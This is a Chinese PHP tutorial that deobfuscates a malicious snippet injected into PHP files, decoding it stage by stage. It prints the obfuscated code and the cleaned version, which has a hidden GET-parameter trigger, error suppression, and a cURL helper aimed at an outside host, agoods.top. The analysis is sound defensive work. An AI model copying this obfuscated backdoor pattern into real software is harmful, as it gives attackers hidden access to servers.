PHP代码混淆解密：一步步揭示隐藏逻辑-php教程-PHP中文网

PHP代码混淆解密：一步步揭示隐藏逻辑

本文详细介绍了如何逐步解密一段PHP混淆代码，从URL解码、字符替换、字符串合并到变量重命名，最终揭示其真实功能。通过实例演示，读者将学会分析此类恶意代码，理解其检查机制、外部通信尝试，并掌握识别和清理潜在威胁的方法，提升PHP代码安全分析能力。

PHP代码混淆解密教程

在web开发和安全领域，我们经常会遇到为了隐藏真实意图而进行混淆处理的php代码，尤其是当服务器文件被植入恶意脚本时。解密这类代码是理解其功能、评估风险并进行清理的关键一步。本教程将以一个典型的php混淆代码为例，详细讲解如何通过系统性的步骤进行解密和分析。

1. 初始混淆代码分析

首先，我们来看一段常见的PHP混淆代码片段。这段代码通常会被注入到合法的文件中，其变量名和字符串构建方式都经过特殊处理，以增加阅读难度。

<?php 
@header('Content-Type:text/html;charset=utf-8');
error_reporting(0); 
$OOOOOO="%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c"; 
global $O; 
$O=urldecode($OOOOOO);
if($_GET[$O{21}.$O{15}.$O{2}.$O{24}]==$O{69}.$O{64}.$O{53}.$O{21}.$O{24}){
    $oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
    $oooOoOoOoOoooooOOooo = explode($O{58}.$O{55}.$O{9}.$O{15}.$O{9},$oooOoOoOoooOooOOooooo);
    if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){ 
        echo $O{81}.$O{8}.$O{17}.$O{88}.$O{82};
        exit;
    }else{
        echo $O{81}.$O{13}.$O{10}.$O{7}.$O{18}.$O{88}.$O{82};
        exit;
    }
}

$oOooOO='z0807_1';
$oOooOOoO=$O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$oOooOO.$O{59}.$O{10}.$O{14}.$O{8}.$O{8}.$O{12}.$O{11}.$O{59}.$O{4}.$O{8}.$O{9}; 
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
    $ooooOOOooOo=curl_init();
    curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
    curl_close($ooooOOOooOo);
    return $oooooOOOOooO; 
}

登录后复制

这段代码的特点是使用了大量重复的变量名（如$OOOOOO, $O, $oooOoOoOoooOooOOooooo等）、字符索引访问（$O{x}）和URL编码字符串。error_reporting(0)通常是恶意代码隐藏其执行错误的常见做法。

2. 逐步解密过程

解密混淆代码需要耐心和系统的方法。我们将按照以下步骤进行：

2.1 解码初始混淆字符串

首先，代码定义了一个URL编码的字符串$OOOOOO，并将其urldecode后赋值给$O。这是揭示后续所有字符串的基础。

立即学习“PHP免费学习笔记（深入）”；

$OOOOOO="%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c"; 
$O=urldecode($OOOOOO);
// 解码后，$O 字符串内容为：
// "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-"?> <.-=:/1230654879';()&^$[]\%{}!*|+,";

登录后复制

这个$O字符串包含了后续代码中所有常量字符串的字符来源，它似乎是按照键盘布局（从QWERTY到数字符号）排列的。

2.2 替换字符索引访问

混淆代码大量使用了$O{x}的语法来访问$O字符串中的特定字符。虽然PHP中这种{}语法用于字符串索引访问已被弃用，但在旧代码或某些混淆器中仍可见。我们需要将这些索引替换为实际的字符。

// 原始代码片段
if($_GET[$O{21}.$O{15}.$O{2}.$O{24}]==$O{69}.$O{64}.$O{53}.$O{21}.$O{24}){
    // ...
    $oooOoOoOoOoooooOOooo = explode($O{58}.$O{55}.$O{9}.$O{15}.$O{9},$oooOoOoOoooOooOOooooo);
    // ...
    echo $O{81}.$O{8}.$O{17}.$O{88}.$O{82};
    // ...
    echo $O{81}.$O{13}.$O{10}.$O{7}.$O{18}.$O{88}.$O{82};
    // ...
}
$oOooOOoO=$O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$oOooOO.$O{59}.$O{10}.$O{14}.$O{8}.$O{8}.$O{12}.$O{11}.$O{59}.$O{4}.$O{8}.$O{9};

登录后复制

通过查找$O字符串中对应索引的字符，我们可以得到：

$O{21} -> c
$O{15} -> h
$O{2} -> e
$O{24} -> n
$O{69} -> 5
$O{64} -> 1
$O{53} -> -
$O{58} -> <
$O{55} -> ?
$O{9} -> p
$O{15} -> h
$O{9} -> p
$O{81} -> [
$O{8} -> o
$O{17} -> k
$O{88} -> !
$O{82} -> ]
$O{13} -> f
$O{10} -> a
$O{7} -> i
$O{18} -> l

替换后，代码变为：

腾讯云AI代码助手

基于混元代码大模型的AI辅助编码工具

查看详情

if($_GET["c"."h"."e"."n"]=="5"."1"."-"."c"."n"){
    $oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
    $oooOoOoOoOoooooOOooo = explode("<"."?"."p"."h"."p",$oooOoOoOoooOooOOooooo);
    if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){ 
        echo "["."o"."k"."!"."]";
        exit;
    }else{
        echo "["."f"."a"."i"."l"."!"."]";
        exit;
    }
}

$oOooOO='z0807_1';
$oOooOOoO="h"."t"."t"."p".":"."/"."/".$oOooOO."."."a"."g"."o"."o"."d"."s"."."."t"."o"."p"; 
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
    $ooooOOOooOo=curl_init();
    curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
    curl_close($ooooOOOooOo);
    return $oooooOOOOooO; 
}

登录后复制

2.3 合并字符串片段

现在，我们可以将由.连接的字符串片段合并成完整的字符串，进一步提高可读性。

if($_GET["chen"]=="51-cn"){
    $oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
    $oooOoOoOoOoooooOOooo = explode("<?php",$oooOoOoOoooOooOOooooo);
    if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){ 
        echo "[ok!]";
        exit;
    }else{
        echo "[fail!]";
        exit;
    }
}

$oOooOO='z0807_1';
$oOooOOoO="http://".$oOooOO.".agoods.top"; 
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
    $ooooOOOooOo=curl_init();
    curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
    curl_close($ooooOOOooOo);
    return $oooooOOOOooO; 
}

登录后复制

2.4 重命名变量和函数

混淆代码通常使用无意义或难以记忆的变量名（如$oooOoOoOoooOooOOooooo）和函数名。重命名它们是提高代码可读性和理解其逻辑的重要步骤。

if($_GET["chen"]=="51-cn"){
    $thisFileSource = file_get_contents(__FILE__);
    $parts = explode("<?php",$thisFileSource);
    if(strpos($parts[1],'%71%77%65')!==false){ 
        echo "[ok!]";
        exit;
    }else{
        echo "[fail!]";
        exit;
    }
}

$subdomain='z0807_1';
$url="http://".$subdomain.".agoods.top"; 
function sendRequest($url){
    $curl=curl_init();
    curl_setopt ($curl, CURLOPT_URL, $url);
    curl_setopt ($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($curl, CURLOPT_CONNECTTIMEOUT, 5);
    $result = curl_exec($curl);
    curl_close($curl);
    return $result; 
}

登录后复制

同时，为了更好的代码规范，我们可以将curl_setopt的长行拆分为多行。

3. 解密后的代码分析与功能推断

经过上述步骤，代码变得清晰易读。现在我们可以分析其具体功能：

<?php 
@header('Content-Type:text/html;charset=utf-8');
error_reporting(0); 

if($_GET["chen"]=="51-cn"){
    $thisFileSource = file_get_contents(__FILE__); // 读取当前文件内容
    $parts = explode("<?php",$thisFileSource); // 以"<?php"分割文件内容

    // 检查第二个PHP代码块（即第一个"<?php"标签之后的内容）是否包含"%71%77%65"（即"qwe"的URL编码）
    if(strpos($parts[1],'%71%77%65')!==false){ 
        echo "[ok!]"; // 如果包含，输出"[ok!]"
        exit;
    }else{
        echo "[fail!]"; // 否则，输出"[fail!]"
        exit;
    }
}

$subdomain='z0807_1';
$url="http://".$subdomain.".agoods.top"; // 构建一个外部URL：http://z0807_1.agoods.top

function sendRequest($url){
    $curl=curl_init();
    curl_setopt ($curl, CURLOPT_URL, $url); // 设置请求URL
    curl_setopt ($curl, CURLOPT_RETURNTRANSFER, 1); // 将响应作为字符串返回
    curl_setopt ($curl, CURLOPT_CONNECTTIMEOUT, 5); // 设置连接超时时间
    $result = curl_exec($curl); // 执行cURL请求
    curl_close($curl); // 关闭cURL会话
    return $result; // 返回请求结果
}
?>

登录后复制

功能推断：

条件执行： 代码首先检查URL查询参数chen是否等于51-cn。如果满足此条件，则执行内部逻辑。这表明该代码可能是一个后门或某种验证机制，只有在特定参数下才会被激活。
文件内容自检： 如果条件满足，它会读取当前PHP文件的内容，并尝试以<?php为分隔符进行分割。然后，它检查第一个<?php标签之后的内容（即$parts[1]）是否包含字符串%71%77%65（解码后为qwe）。
- 如果包含，输出[ok!]并退出。
- 如果不包含，输出[fail!]并退出。这个自检机制看起来有些“无用”，因为如果代码本身不存在，它就不会运行。但它可能是一种简单的存活检查，或者用于确认代码的完整性。
外部通信准备： 代码定义了一个子域名z0807_1，并构建了一个URL http://z0807_1.agoods.top。它还定义了一个sendRequest函数，用于通过cURL向任意URL发送HTTP请求。
- 重要提示： 在提供的代码片段中，sendRequest函数被定义但从未被调用。这意味着这个特定的代码片段本身并没有主动发起外部请求。然而，这并不排除该函数可能在文件的其他部分或通过其他注入代码被调用。攻击者通常会将核心功能分散到多个注入点。